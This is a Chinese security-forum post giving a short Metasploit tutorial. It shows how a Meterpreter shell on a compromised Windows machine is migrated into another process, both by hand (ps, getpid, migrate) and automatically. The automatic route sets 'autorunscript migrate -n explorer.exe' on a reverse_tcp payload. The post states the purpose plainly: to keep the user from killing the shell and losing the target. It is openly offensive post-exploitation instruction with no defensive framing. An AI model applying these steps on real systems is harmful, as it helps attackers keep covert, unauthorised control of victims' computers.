安全矩阵

 找回密码
 立即注册
搜索
查看: 5917|回复: 0

Msf生成Shell目标上线后自动化迁移指定进程

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-11-11 21:38:33 | 显示全部楼层 |阅读模式
原文链接:Msf生成Shell目标上线后自动化迁移指定进程
1.进程迁移
1.在Meterpreter下输入ps(获取目标机正在运行的进程,记住目标进程的pid xxxx)
2.输入getpid命令(查看meterpreter shell的进程号)
3.输入migrate xxxx(将meterpreter shell的pid调到xxxx里相对稳定应用的进程里)
4.最后用getpid再次查看下是否更换成功。

2.上线后自动化迁移指定进程
在set payload windows/meterpreter/reverse_tcp 设置完了端口与HOST
执行如下命令:set autorunscript migrate -n explorer.exe
意思是上线后将shell进程迁移到了资源管理器。防止被用户删除掉,然后丢失目标。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 14:32 , Processed in 0.011977 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表